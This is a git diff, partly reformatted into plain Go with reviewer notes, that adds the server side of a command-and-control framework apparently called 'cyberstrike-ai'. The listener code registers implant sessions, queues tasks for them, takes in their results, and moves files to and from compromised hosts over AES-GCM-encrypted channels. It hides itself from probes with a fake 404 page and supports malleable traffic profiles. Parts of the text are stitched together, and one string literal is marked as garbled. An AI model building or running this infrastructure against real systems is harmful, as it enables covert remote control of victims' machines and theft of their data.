diff --git a/c2/beacon_host.go b/c2/beacon_host.go new file mode 100644 index 00000000..9899c6a6 --- /dev/null +++ b/c2/beacon_host.go @@ -0,0 +1,39 @@ +package c2 + +import ( + "strings" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// ResolveBeaconDialHost 决定植入端应连接的主机名(不含端口)。 +// 优先级:explicitOverride > 监听器 config_json 中的 callback_host > bind_host(0.0.0.0/::/空 时 detectExternalIP,失败则 127.0.0.1)。 +func ResolveBeaconDialHost(listener *database.C2Listener, explicitOverride string, logger *zap.Logger, listenerID string) string { + if h := strings.TrimSpace(explicitOverride); h != "" { + return h + } + cfg := &ListenerConfig{} + if listener != nil && listener.ConfigJSON != "" { + _ = parseJSON(listener.ConfigJSON, cfg) + } + if h := strings.TrimSpace(cfg.CallbackHost); h != "" { + return h + } + if listener == nil { + return "127.0.0.1" + } + host := strings.TrimSpace(listener.BindHost) + if host == "0.0.0.0" || host == "" || host == "::" { + host = detectExternalIP() + if host == "" { + if logger != nil { + logger.Warn("listener binds 0.0.0.0 but no external IP detected, falling back to 127.0.0.1; set callback_host or pass explicit host", + zap.String("listener_id", listenerID)) + } + return "127.0.0.1" + } + } + return host +} diff --git a/c2/crypto.go b/c2/crypto.go new file mode 100644 index 00000000..bf4c5ddd --- /dev/null +++ b/c2/crypto.go @@ -0,0 +1,154 @@ +package c2 + +import ( + "crypto/aes" + "crypto/cipher" + "crypto/rand" + "encoding/base64" + "errors" + "io" +) + +// AES-256-GCM 信封:每个 Listener 独立 32 字节密钥 + 每条消息独立 12 字节 nonce。 +// 协议格式(base64 文本,便于 HTTP body / SSE 直接传): +// base64( nonce(12) || ciphertext+tag ) +// 设计要点: +// - GCM 自带 16 字节 AEAD tag,完整性 + 机密性一次性搞定,无需额外 HMAC; +// - nonce 由 crypto/rand 生成,96bit 在密钥不变期内重复概率极低(< 2^-32 / 4B 次); +// - 密钥不出服务端:listener 创建时随机生成 32 字节,编译 beacon 时硬编码进去。 + +// GenerateAESKey 生成随机 32 字节 AES-256 密钥并 base64 输出 +func GenerateAESKey() (string, error) { + key := make([]byte, 32) + if _, err := 
// AES-256-GCM envelope helpers.
//
// Wire format (base64 text so it can travel in an HTTP body or SSE frame):
//
//	base64( nonce(12) || ciphertext+tag )
//
// Every message gets a fresh random nonce; the GCM tag provides integrity,
// so no separate MAC is used.

// GenerateAESKey returns a fresh random 32-byte AES-256 key encoded with
// standard base64.
func GenerateAESKey() (string, error) {
	key := make([]byte, 32)
	if _, err := io.ReadFull(rand.Reader, key); err != nil {
		return "", err
	}
	return base64.StdEncoding.EncodeToString(key), nil
}

// GenerateImplantToken returns a fresh random 32-byte token encoded with
// unpadded URL-safe base64.
func GenerateImplantToken() (string, error) {
	t := make([]byte, 32)
	if _, err := io.ReadFull(rand.Reader, t); err != nil {
		return "", err
	}
	return base64.RawURLEncoding.EncodeToString(t), nil
}

// EncryptAESGCM encrypts plaintext under the base64-encoded 32-byte key and
// returns base64(nonce||ciphertext+tag). It is EncryptAESGCMWithAAD with no
// additional authenticated data.
func EncryptAESGCM(keyB64 string, plaintext []byte) (string, error) {
	return EncryptAESGCMWithAAD(keyB64, plaintext, nil)
}

// DecryptAESGCM reverses EncryptAESGCM and returns the plaintext. It fails
// when the key or ciphertext is malformed, the envelope is shorter than
// nonce+tag, or authentication fails.
func DecryptAESGCM(keyB64, encB64 string) ([]byte, error) {
	return openAESGCM(keyB64, encB64, nil, "aead open failed (key mismatch or tampered)")
}

// EncryptAESGCMWithAAD encrypts with additional authenticated data bound to
// context (e.g. session_id), so that a ciphertext produced for one context
// fails authentication when presented with a different AAD.
func EncryptAESGCMWithAAD(keyB64 string, plaintext []byte, aad []byte) (string, error) {
	gcm, err := newAESGCM(keyB64)
	if err != nil {
		return "", err
	}
	nonceSize := gcm.NonceSize()
	// One buffer sized for nonce||ciphertext||tag: Seal appends in place
	// instead of allocating a second slice and copying.
	out := make([]byte, nonceSize, nonceSize+len(plaintext)+gcm.Overhead())
	if _, err := io.ReadFull(rand.Reader, out); err != nil {
		return "", err
	}
	out = gcm.Seal(out, out[:nonceSize], plaintext, aad)
	return base64.StdEncoding.EncodeToString(out), nil
}

// DecryptAESGCMWithAAD decrypts an envelope and verifies it against aad.
func DecryptAESGCMWithAAD(keyB64, encB64 string, aad []byte) ([]byte, error) {
	return openAESGCM(keyB64, encB64, aad, "aead open failed (key mismatch, tampered, or AAD mismatch)")
}

// newAESGCM builds the AES-256-GCM AEAD for a base64-encoded key.
func newAESGCM(keyB64 string) (cipher.AEAD, error) {
	key, err := decodeKey(keyB64)
	if err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// openAESGCM decodes and authenticates an envelope. openFailMsg is the error
// text reported when authentication fails, so each public entry point keeps
// its own message.
func openAESGCM(keyB64, encB64 string, aad []byte, openFailMsg string) ([]byte, error) {
	gcm, err := newAESGCM(keyB64)
	if err != nil {
		return nil, err
	}
	raw, err := base64.StdEncoding.DecodeString(encB64)
	if err != nil {
		return nil, errors.New("ciphertext base64 invalid")
	}
	nonceSize := gcm.NonceSize()
	if len(raw) < nonceSize+gcm.Overhead() { // must hold at least nonce + tag
		return nil, errors.New("ciphertext too short")
	}
	pt, err := gcm.Open(nil, raw[:nonceSize], raw[nonceSize:], aad)
	if err != nil {
		return nil, errors.New(openFailMsg)
	}
	return pt, nil
}

// decodeKey decodes a standard-base64 key and enforces the AES-256 length.
func decodeKey(keyB64 string) ([]byte, error) {
	key, err := base64.StdEncoding.DecodeString(keyB64)
	if err != nil {
		return nil, errors.New("key base64 invalid")
	}
	if len(key) != 32 {
		return nil, errors.New("key must be 32 bytes (AES-256)")
	}
	return key, nil
}
// Event is the unit carried by EventBus: the live counterpart of the
// persisted C2 event record, pushed to online SSE/WS subscribers.
type Event struct {
	ID        string                 `json:"id"`
	Level     string                 `json:"level"`
	Category  string                 `json:"category"`
	SessionID string                 `json:"sessionId,omitempty"`
	TaskID    string                 `json:"taskId,omitempty"`
	Message   string                 `json:"message"`
	Data      map[string]interface{} `json:"data,omitempty"`
	CreatedAt time.Time              `json:"createdAt"`
}

// EventBus is a small in-memory broadcast bus.
//
//   - Each subscriber owns a buffered channel, so a slow consumer never
//     blocks the publisher.
//   - When a subscriber's buffer is full the event is dropped for that
//     subscriber and its drop counter is incremented.
//   - Subscriptions may filter by session, category and level.
//   - Close closes every subscriber channel.
type EventBus struct {
	mu          sync.RWMutex
	subscribers map[string]*Subscription
	closed      bool
}

// Subscription is the handle returned by Subscribe.
type Subscription struct {
	ID        string
	Ch        chan *Event
	SessionID string // empty means no session filter
	Category  string // empty means no category filter
	Levels    map[string]struct{}
	dropCount atomic.Int64
}

// NewEventBus creates an empty, open bus.
func NewEventBus() *EventBus {
	return &EventBus{subscribers: make(map[string]*Subscription)}
}

// Subscribe registers a subscriber and returns its Subscription; the caller
// is responsible for calling Unsubscribe later.
//
//   - bufferSize: channel capacity; values <= 0 default to 128.
//   - sessionFilter / categoryFilter: empty string means "any".
//   - levelFilter: e.g. []string{"warn","critical"}; nil or empty accepts all.
//
// On a closed bus the returned subscription's channel is already closed.
// Subscribing with an id that is already registered replaces the map entry;
// the previous subscription's channel is left as it is.
func (b *EventBus) Subscribe(id string, bufferSize int, sessionFilter, categoryFilter string, levelFilter []string) *Subscription {
	if bufferSize <= 0 {
		bufferSize = 128
	}
	sub := &Subscription{
		ID:        id,
		Ch:        make(chan *Event, bufferSize),
		SessionID: sessionFilter,
		Category:  categoryFilter,
	}
	if len(levelFilter) > 0 {
		sub.Levels = make(map[string]struct{}, len(levelFilter))
		for _, l := range levelFilter {
			sub.Levels[l] = struct{}{}
		}
	}
	b.mu.Lock()
	defer b.mu.Unlock()
	if b.closed {
		close(sub.Ch)
		return sub
	}
	b.subscribers[id] = sub
	return sub
}

// Unsubscribe removes the subscriber registered under id and closes its
// channel. Unknown ids are ignored.
func (b *EventBus) Unsubscribe(id string) {
	b.mu.Lock()
	defer b.mu.Unlock()
	if sub, ok := b.subscribers[id]; ok {
		delete(b.subscribers, id)
		close(sub.Ch)
	}
}

// Publish delivers e to every matching subscriber without blocking; when a
// subscriber's buffer is full the event is dropped for that subscriber.
// Nil events and publishes on a closed bus are no-ops.
func (b *EventBus) Publish(e *Event) {
	if e == nil {
		return
	}
	// The read lock is held across the sends on purpose: channels are only
	// closed under the write lock (Unsubscribe/Close), so no channel can be
	// closed between the match and the send. Releasing the lock first would
	// allow a "send on closed channel" panic. Every send is non-blocking, so
	// the lock is never held while waiting on a consumer.
	b.mu.RLock()
	defer b.mu.RUnlock()
	if b.closed {
		return
	}
	for _, s := range b.subscribers {
		if !s.matches(e) {
			continue
		}
		select {
		case s.Ch <- e:
		default:
			s.dropCount.Add(1)
		}
	}
}

// Close shuts the bus down and closes every subscriber channel. It is safe
// to call more than once.
func (b *EventBus) Close() {
	b.mu.Lock()
	defer b.mu.Unlock()
	if b.closed {
		return
	}
	b.closed = true
	for id, s := range b.subscribers {
		close(s.Ch)
		delete(b.subscribers, id)
	}
}

// matches reports whether e passes the subscription's session, category and
// level filters.
func (s *Subscription) matches(e *Event) bool {
	if s.SessionID != "" && e.SessionID != s.SessionID {
		return false
	}
	if s.Category != "" && e.Category != s.Category {
		return false
	}
	if len(s.Levels) > 0 {
		if _, ok := s.Levels[e.Level]; !ok {
			return false
		}
	}
	return true
}

// hitlRunCtxKey is the private context key under which the long-lived run
// context is stored.
type hitlRunCtxKey struct{}

// WithHITLRunContext attaches runCtx (typically the lifetime of the whole
// agent / SSE request) to ctx. A tool handler may receive a ctx that is
// cancelled as soon as the tool returns; human-in-the-loop approval for
// dangerous tasks should wait on the context returned by HITLUserContext
// instead. If either argument is nil, ctx is returned unchanged.
func WithHITLRunContext(ctx, runCtx context.Context) context.Context {
	if ctx == nil || runCtx == nil {
		return ctx
	}
	return context.WithValue(ctx, hitlRunCtxKey{}, runCtx)
}

// HITLUserContext returns the context to wait on for HITL approval: the run
// context injected by WithHITLRunContext when present, otherwise ctx itself.
// A nil ctx yields context.Background().
func HITLUserContext(ctx context.Context) context.Context {
	if ctx == nil {
		return context.Background()
	}
	if run, ok := ctx.Value(hitlRunCtxKey{}).(context.Context); ok && run != nil {
		return run
	}
	return ctx
}
// ---- c2/io.go ----

// These thin wrappers exist so that:
//   - manager.go / handler code reads more directly without importing os
//     again and again;
//   - they can later be swapped for an interface (for example an
//     internal/storage implementation) to ease unit testing.

// osMkdirAll forwards to os.MkdirAll.
func osMkdirAll(path string, perm os.FileMode) error {
	return os.MkdirAll(path, perm)
}

// osWriteFile forwards to os.WriteFile.
func osWriteFile(path string, data []byte, perm os.FileMode) error {
	return os.WriteFile(path, data, perm)
}

// base64Decode decodes standard (padded) base64.
func base64Decode(s string) ([]byte, error) {
	return base64.StdEncoding.DecodeString(s)
}

// ---- c2/listener.go ----

// Listener is the transport abstraction: every transport (TCP/HTTP/HTTPS/
// WS/DNS) implements it. The Manager is unaware of implementation details
// and creates instances through the ListenerRegistry factories.
type Listener interface {
	// Type returns the listener's type string (e.g. "tcp_reverse").
	Type() string
	// Start begins listening; it should return ErrPortInUse when the port is
	// already taken.
	Start() error
	// Stop stops listening and releases all related goroutines (it should
	// not panic).
	Stop() error
}

// ListenerCreationCtx is the context handed to a factory when it builds a
// listener.
type ListenerCreationCtx struct {
	Listener *database.C2Listener
	Config   *ListenerConfig
	Manager  *Manager
	Logger   *zap.Logger
}

// ListenerFactory builds a listener instance; the returned instance has not
// been started yet.
type ListenerFactory func(ctx ListenerCreationCtx) (Listener, error)

// ListenerRegistry maps a type name to its factory. Concrete implementations
// are registered at application start-up; tests may register mock factories.
type ListenerRegistry struct {
	mu        sync.RWMutex
	factories map[string]ListenerFactory
}

// NewListenerRegistry creates an empty registry.
func NewListenerRegistry() *ListenerRegistry {
	return &ListenerRegistry{factories: make(map[string]ListenerFactory)}
}

// Register stores f under typeName. The name is trimmed and lower-cased, so
// lookups are case-insensitive; registering the same name again overwrites
// the previous factory.
func (r *ListenerRegistry) Register(typeName string, f ListenerFactory) {
	r.mu.Lock()
	defer r.mu.Unlock()
	r.factories[strings.ToLower(strings.TrimSpace(typeName))] = f
}
+ +// Get 取工厂;nil 表示未注册 +func (r *ListenerRegistry) Get(typeName string) ListenerFactory { + r.mu.RLock() + defer r.mu.RUnlock() + return r.factories[strings.ToLower(strings.TrimSpace(typeName))] +} + +// RegisteredTypes 列出已注册的类型,给前端枚举用 +func (r *ListenerRegistry) RegisteredTypes() []string { + r.mu.RLock() + defer r.mu.RUnlock() + out := make([]string, 0, len(r.factories)) + for k := range r.factories { + out = append(out, k) + } + return out +} diff --git a/c2/listener_http.go b/c2/listener_http.go new file mode 100644 index 00000000..52bf5f18 --- /dev/null +++ b/c2/listener_http.go @@ -0,0 +1,549 @@ +package c2 + +import ( + "crypto/ecdsa" + "crypto/elliptic" + "crypto/rand" + "crypto/sha256" + "crypto/subtle" + "crypto/tls" + "crypto/x509" + "crypto/x509/pkix" + "encoding/base64" + "encoding/hex" + "encoding/json" + "encoding/pem" + "errors" + "fmt" + "io" + "math/big" + mrand "math/rand" + "net" + "net/http" + "os" + "path/filepath" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/database" + + "go.uber.org/zap" +) + +// HTTPBeaconListener 实现 HTTP/HTTPS Beacon: +// - beacon 端定期 POST {checkin_path}(携带 implant_token + AES 加密 body); +// - 服务端解密、登记会话、回执 sleep + 是否有任务; +// - beacon 收到 has_tasks=true 时 GET {tasks_path} 拉取加密任务列表; +// - 任务完成后 POST {result_path} 回传结果。 +// +// 优势:所有任务异步、可批量、支持文件上传/截图/任意大 blob,是 C2 的"主战场"。 +type HTTPBeaconListener struct { + rec *database.C2Listener + cfg *ListenerConfig + manager *Manager + logger *zap.Logger + useTLS bool + profile *database.C2Profile + + srv *http.Server + mu sync.Mutex + stopCh chan struct{} + stopped bool +} + +// NewHTTPBeaconListener 工厂(注册到 ListenerRegistry["http_beacon"]) +func NewHTTPBeaconListener(ctx ListenerCreationCtx) (Listener, error) { + return &HTTPBeaconListener{ + rec: ctx.Listener, + cfg: ctx.Config, + manager: ctx.Manager, + logger: ctx.Logger, + useTLS: false, + stopCh: make(chan struct{}), + }, nil +} + +// NewHTTPSBeaconListener 工厂(注册到 ListenerRegistry["https_beacon"]) +func 
NewHTTPSBeaconListener(ctx ListenerCreationCtx) (Listener, error) { + return &HTTPBeaconListener{ + rec: ctx.Listener, + cfg: ctx.Config, + manager: ctx.Manager, + logger: ctx.Logger, + useTLS: true, + stopCh: make(chan struct{}), + }, nil +} + +// Type 类型字符串 +func (l *HTTPBeaconListener) Type() string { + if l.useTLS { + return string(ListenerTypeHTTPSBeacon) + } + return string(ListenerTypeHTTPBeacon) +} + +// Start 起 HTTP server +func (l *HTTPBeaconListener) Start() error { + // Load Malleable Profile if configured + l.loadProfile() + + mux := http.NewServeMux() + mux.HandleFunc(l.cfg.BeaconCheckInPath, l.withProfileHeaders(l.handleCheckIn)) + mux.HandleFunc(l.cfg.BeaconTasksPath, l.withProfileHeaders(l.handleTasks)) + mux.HandleFunc(l.cfg.BeaconResultPath, l.withProfileHeaders(l.handleResult)) + mux.HandleFunc(l.cfg.BeaconUploadPath, l.withProfileHeaders(l.handleUpload)) + mux.HandleFunc(l.cfg.BeaconFilePath, l.withProfileHeaders(l.handleFileServe)) + + addr := fmt.Sprintf("%s:%d", l.rec.BindHost, l.rec.BindPort) + l.srv = &http.Server{ + Addr: addr, + Handler: mux, + ReadHeaderTimeout: 15 * time.Second, + ReadTimeout: 60 * time.Second, + WriteTimeout: 120 * time.Second, + IdleTimeout: 300 * time.Second, + } + + ln, err := net.Listen("tcp", addr) + if err != nil { + if isAddrInUse(err) { + return ErrPortInUse + } + return err + } + + if l.useTLS { + tlsConfig, err := l.buildTLSConfig() + if err != nil { + _ = ln.Close() + return fmt.Errorf("build TLS config: %w", err) + } + l.srv.TLSConfig = tlsConfig + go func() { + if err := l.srv.ServeTLS(ln, "", ""); err != nil && !errors.Is(err, http.ErrServerClosed) { + l.logger.Warn("https_beacon ServeTLS exited", zap.Error(err)) + } + }() + } else { + go func() { + if err := l.srv.Serve(ln); err != nil && !errors.Is(err, http.ErrServerClosed) { + l.logger.Warn("http_beacon Serve exited", zap.Error(err)) + } + }() + } + return nil +} + +// Stop 关闭 +func (l *HTTPBeaconListener) Stop() error { + l.mu.Lock() + if l.stopped 
// Stop shuts the listener down. It is idempotent: the first call marks the
// listener stopped, closes stopCh and gives the HTTP server five seconds
// (via contextWithTimeout) to shut down; later calls return immediately.
// The Shutdown error is deliberately discarded.
func (l *HTTPBeaconListener) Stop() error {
	l.mu.Lock()
	if l.stopped {
		l.mu.Unlock()
		return nil
	}
	l.stopped = true
	close(l.stopCh)
	l.mu.Unlock()
	if l.srv != nil {
		ctx, cancel := contextWithTimeout(5 * time.Second)
		defer cancel()
		_ = l.srv.Shutdown(ctx)
	}
	return nil
}

// ----------------------------------------------------------------------------
// HTTP handlers
// ----------------------------------------------------------------------------

// handleCheckIn processes a beacon check-in (POST only, body capped at
// 1 MiB). After the implant token is verified, the body is first tried as an
// AES-GCM envelope; if decryption fails it is parsed as plaintext JSON for
// lightweight clients such as a curl one-liner. Missing identity fields are
// filled from the remote address, the session is registered through the
// manager, and the reply (sleep, jitter, has-tasks flag) is sent in the same
// form the request arrived in: plaintext JSON or encrypted.
func (l *HTTPBeaconListener) handleCheckIn(w http.ResponseWriter, r *http.Request) {
	if r.Method != http.MethodPost {
		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
		return
	}
	if !l.checkImplantToken(r) {
		l.disguisedReject(w)
		return
	}
	body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 1<<20))
	if err != nil {
		http.Error(w, "read failed", http.StatusBadRequest)
		return
	}

	// Try AES-GCM first (the full beacon binary uses the encrypted channel).
	var req ImplantCheckInRequest
	plaintext, decErr := DecryptAESGCM(l.rec.EncryptionKey, string(body))
	if decErr == nil {
		if err := json.Unmarshal(plaintext, &req); err != nil {
			l.disguisedReject(w)
			return
		}
	} else {
		// Decryption failed: fall back to plaintext JSON (compatibility with
		// curl one-liners and other lightweight clients).
		if err := json.Unmarshal(body, &req); err != nil {
			l.disguisedReject(w)
			return
		}
	}
	isPlaintext := decErr != nil

	if req.UserAgent == "" {
		req.UserAgent = r.UserAgent()
	}
	if req.SleepSeconds <= 0 {
		req.SleepSeconds = l.cfg.DefaultSleep
	}
	// A curl one-liner may omit most fields; derive a stable identity from
	// the remote IP and the listener ID. A SplitHostPort failure leaves host
	// empty.
	host, _, _ := net.SplitHostPort(r.RemoteAddr)
	if strings.TrimSpace(req.ImplantUUID) == "" {
		// Same IP + same listener => same UUID, so repeated check-ins from
		// one address reuse one session.
		req.ImplantUUID = fmt.Sprintf("curl_%s_%s", host, shortHash(host+l.rec.ID))
	}
	if strings.TrimSpace(req.Hostname) == "" {
		req.Hostname = "curl_" + host
	}
	if strings.TrimSpace(req.InternalIP) == "" {
		req.InternalIP = host
	}
	if strings.TrimSpace(req.OS) == "" {
		req.OS = "unknown"
	}
	if strings.TrimSpace(req.Arch) == "" {
		req.Arch = "unknown"
	}
	session, err := l.manager.IngestCheckIn(l.rec.ID, req)
	if err != nil {
		http.Error(w, "ingest failed", http.StatusInternalServerError)
		return
	}
	// Only existence matters here, hence Limit 1. A listing error is ignored
	// and simply reports "no tasks".
	queued, _ := l.manager.DB().ListC2Tasks(database.ListC2TasksFilter{
		SessionID: session.ID,
		Status:    string(TaskQueued),
		Limit:     1,
	})
	resp := ImplantCheckInResponse{
		SessionID:  session.ID,
		NextSleep:  session.SleepSeconds,
		NextJitter: session.JitterPercent,
		HasTasks:   len(queued) > 0,
		ServerTime: time.Now().UnixMilli(),
	}
	if isPlaintext {
		w.Header().Set("Content-Type", "application/json")
		json.NewEncoder(w).Encode(resp)
	} else {
		l.writeEncrypted(w, resp)
	}
}
// handleTasks returns the pending tasks for a session (GET only). The
// session is identified by the session_id query parameter; up to 50 task
// envelopes are popped through the manager and returned under the "tasks"
// key, as plaintext JSON for clients detected by isPlaintextClient and
// encrypted otherwise.
// NOTE(review): the session is loaded only to confirm that it exists; this
// handler does not check that it belongs to this listener — confirm whether
// that is enforced elsewhere.
func (l *HTTPBeaconListener) handleTasks(w http.ResponseWriter, r *http.Request) {
	if r.Method != http.MethodGet {
		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
		return
	}
	if !l.checkImplantToken(r) {
		l.disguisedReject(w)
		return
	}
	sessionID := r.URL.Query().Get("session_id")
	if sessionID == "" {
		l.disguisedReject(w)
		return
	}
	session, err := l.manager.DB().GetC2Session(sessionID)
	if err != nil || session == nil {
		l.disguisedReject(w)
		return
	}
	envelopes, err := l.manager.PopTasksForBeacon(sessionID, 50)
	if err != nil {
		http.Error(w, "pop tasks failed", http.StatusInternalServerError)
		return
	}
	// Make sure the JSON carries "tasks": [] rather than null.
	if envelopes == nil {
		envelopes = []TaskEnvelope{}
	}
	resp := map[string]interface{}{"tasks": envelopes}
	if l.isPlaintextClient(r) {
		w.Header().Set("Content-Type", "application/json")
		json.NewEncoder(w).Encode(resp)
	} else {
		l.writeEncrypted(w, resp)
	}
}

// handleResult ingests a task result report (POST only, body capped at
// 64 MiB). As with check-in, the body is tried as an AES-GCM envelope first
// and as plaintext JSON when decryption fails; the parsed report is handed
// to the manager and a small {"ok":"1"} acknowledgement is returned.
func (l *HTTPBeaconListener) handleResult(w http.ResponseWriter, r *http.Request) {
	if r.Method != http.MethodPost {
		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
		return
	}
	if !l.checkImplantToken(r) {
		l.disguisedReject(w)
		return
	}
	body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 64<<20))
	if err != nil {
		http.Error(w, "read failed", http.StatusBadRequest)
		return
	}
	var report TaskResultReport
	plaintext, decErr := DecryptAESGCM(l.rec.EncryptionKey, string(body))
	if decErr == nil {
		if err := json.Unmarshal(plaintext, &report); err != nil {
			l.disguisedReject(w)
			return
		}
	} else {
		if err := json.Unmarshal(body, &report); err != nil {
			l.disguisedReject(w)
			return
		}
	}
	if err := l.manager.IngestTaskResult(report); err != nil {
		http.Error(w, "ingest result failed", http.StatusInternalServerError)
		return
	}
	resp := map[string]string{"ok": "1"}
	if l.isPlaintextClient(r) {
		w.Header().Set("Content-Type", "application/json")
		json.NewEncoder(w).Encode(resp)
	} else {
		l.writeEncrypted(w, resp)
	}
}
return + } + var report TaskResultReport + plaintext, decErr := DecryptAESGCM(l.rec.EncryptionKey, string(body)) + if decErr == nil { + if err := json.Unmarshal(plaintext, &report); err != nil { + l.disguisedReject(w) + return + } + } else { + if err := json.Unmarshal(body, &report); err != nil { + l.disguisedReject(w) + return + } + } + if err := l.manager.IngestTaskResult(report); err != nil { + http.Error(w, "ingest result failed", http.StatusInternalServerError) + return + } + resp := map[string]string{"ok": "1"} + if l.isPlaintextClient(r) { + w.Header().Set("Content-Type", "application/json") + json.NewEncoder(w).Encode(resp) + } else { + l.writeEncrypted(w, resp) + } +} + +// handleUpload 实现 implant 主动上传文件给服务端(如 download 任务的二进制结果)。 +// Body 为 AES-GCM 加密后的 base64,与 check-in/result 保持一致的安全策略。 +func (l *HTTPBeaconListener) handleUpload(w http.ResponseWriter, r *http.Request) { + if r.Method != http.MethodPost { + http.Error(w, "method not allowed", http.StatusMethodNotAllowed) + return + } + if !l.checkImplantToken(r) { + l.disguisedReject(w) + return + } + taskID := r.URL.Query().Get("task_id") + if taskID == "" { + l.disguisedReject(w) + return + } + body, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 256<<20)) + if err != nil { + http.Error(w, "read failed", http.StatusBadRequest) + return + } + plaintext, err := DecryptAESGCM(l.rec.EncryptionKey, string(body)) + if err != nil { + l.disguisedReject(w) + return + } + dir := filepath.Join(l.manager.StorageDir(), "uploads") + if err := os.MkdirAll(dir, 0o755); err != nil { + http.Error(w, "mkdir failed", http.StatusInternalServerError) + return + } + dst := filepath.Join(dir, taskID+".bin") + if err := os.WriteFile(dst, plaintext, 0o644); err != nil { + http.Error(w, "save failed", http.StatusInternalServerError) + return + } + l.writeEncrypted(w, map[string]interface{}{"ok": 1, "size": len(plaintext)}) +} + +// handleFileServe 实现服务端 → implant 的文件下发(upload 任务用)。 +// 路径形如 /file/,文件内容经 AES-GCM 加密后返回。 +func (l 
// handleFileServe delivers a file from the server to the implant (used by
// upload tasks). GET only. The task ID is whatever follows the configured
// file path prefix in the URL; the file <storage>/downstream/<id>.bin is
// read, base64-encoded under "file_data" and returned encrypted.
func (l *HTTPBeaconListener) handleFileServe(w http.ResponseWriter, r *http.Request) {
	if r.Method != http.MethodGet {
		http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
		return
	}
	if !l.checkImplantToken(r) {
		l.disguisedReject(w)
		return
	}
	prefix := l.cfg.BeaconFilePath
	taskID := strings.TrimPrefix(r.URL.Path, prefix)
	// Reject anything that could escape the downstream directory.
	if taskID == "" || strings.Contains(taskID, "/") || strings.Contains(taskID, "\\") || strings.Contains(taskID, "..") {
		l.disguisedReject(w)
		return
	}
	fpath := filepath.Join(l.manager.StorageDir(), "downstream", taskID+".bin")
	absPath, err := filepath.Abs(fpath)
	if err != nil {
		l.disguisedReject(w)
		return
	}
	// Second line of defence: the absolute path must stay under the
	// absolute downstream directory.
	absDir, err := filepath.Abs(filepath.Join(l.manager.StorageDir(), "downstream"))
	if err != nil || !strings.HasPrefix(absPath, absDir+string(filepath.Separator)) {
		l.disguisedReject(w)
		return
	}
	data, err := os.ReadFile(absPath)
	if err != nil {
		l.disguisedReject(w)
		return
	}
	l.writeEncrypted(w, map[string]interface{}{
		"file_data": base64Encode(data),
	})
}

// ----------------------------------------------------------------------------
// Authentication / output helpers
// ----------------------------------------------------------------------------

// checkImplantToken verifies the X-Implant-Token header against the
// listener's implant token using a constant-time comparison. When that
// header is absent, the raw Cookie header value is compared instead (for
// Malleable Profiles that carry the token in a cookie). An empty presented
// or expected token always fails.
func (l *HTTPBeaconListener) checkImplantToken(r *http.Request) bool {
	got := r.Header.Get("X-Implant-Token")
	if got == "" {
		got = r.Header.Get("Cookie") // compatibility: profile carries the token in Cookie
	}
	expected := l.rec.ImplantToken
	if got == "" || expected == "" {
		return false
	}
	return subtle.ConstantTimeCompare([]byte(got), []byte(expected)) == 1
}

// disguisedReject answers with an HTML-typed 404 so that a failed
// authentication does not reveal that the listener is a C2 endpoint.
// NOTE(review): the body literal is garbled in the reviewed text (its HTML
// markup appears to have been stripped); only the visible bytes are
// reproduced here — restore the original markup from version control.
func (l *HTTPBeaconListener) disguisedReject(w http.ResponseWriter) {
	w.Header().Set("Content-Type", "text/html; charset=utf-8")
	w.WriteHeader(http.StatusNotFound)
	_, _ = fmt.Fprint(w, "\n\n404 Not Found\n\n")
}

// writeEncrypted marshals payload to JSON, seals it with the listener's
// AES-GCM key and writes the base64 envelope as application/octet-stream.
// Marshal or encryption failures produce a 500.
func (l *HTTPBeaconListener) writeEncrypted(w http.ResponseWriter, payload interface{}) {
	body, err := json.Marshal(payload)
	if err != nil {
		http.Error(w, "encode failed", http.StatusInternalServerError)
		return
	}
	enc, err := EncryptAESGCM(l.rec.EncryptionKey, body)
	if err != nil {
		http.Error(w, "encrypt failed", http.StatusInternalServerError)
		return
	}
	w.Header().Set("Content-Type", "application/octet-stream")
	_, _ = w.Write([]byte(enc))
}

// loadProfile loads the Malleable Profile from the manager if the listener
// has a profile_id configured. On failure a warning is logged and the
// listener continues without a profile.
func (l *HTTPBeaconListener) loadProfile() {
	if l.rec.ProfileID == "" {
		return
	}
	profile, err := l.manager.GetProfile(l.rec.ProfileID)
	if err != nil || profile == nil {
		l.logger.Warn("加载 Malleable Profile 失败,使用默认配置",
			zap.String("profile_id", l.rec.ProfileID), zap.Error(err))
		return
	}
	l.profile = profile
	l.logger.Info("Malleable Profile 已加载",
		zap.String("profile_id", profile.ID),
		zap.String("profile_name", profile.Name),
		zap.String("user_agent", profile.UserAgent))
}

// withProfileHeaders wraps a handler so that the loaded profile's response
// headers are set before the handler runs; without a profile it is a
// pass-through.
func (l *HTTPBeaconListener) withProfileHeaders(next http.HandlerFunc) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		if l.profile != nil && len(l.profile.ResponseHeaders) > 0 {
			for k, v := range l.profile.ResponseHeaders {
				w.Header().Set(k, v)
			}
		}
		next(w, r)
	}
}

// ----------------------------------------------------------------------------
// TLS self-signed certificate (for testing / Phase 2 default behaviour)
// ----------------------------------------------------------------------------

// buildTLSConfig returns the server TLS configuration (TLS 1.2 minimum).
// An operator-supplied certificate/key pair is preferred; if it is missing
// or fails to load, a warning is logged and a self-signed certificate whose
// CN is the listener name is generated instead.
func (l *HTTPBeaconListener) buildTLSConfig() (*tls.Config, error) {
	// Operator explicitly provided a certificate: use it first.
	if l.cfg.TLSCertPath != "" && l.cfg.TLSKeyPath != "" {
		cert, err := tls.LoadX509KeyPair(l.cfg.TLSCertPath, l.cfg.TLSKeyPath)
		if err == nil {
			return &tls.Config{Certificates: []tls.Certificate{cert}, MinVersion: tls.VersionTLS12}, nil
		}
		l.logger.Warn("加载 TLS 证书失败,回退自签", zap.Error(err))
	}
	// Self-signed certificate with the listener name as CN.
	cert, err := generateSelfSignedCert(l.rec.Name)
	if err != nil {
		return nil, err
	}
	return &tls.Config{Certificates: []tls.Certificate{cert}, MinVersion: tls.VersionTLS12}, nil
}
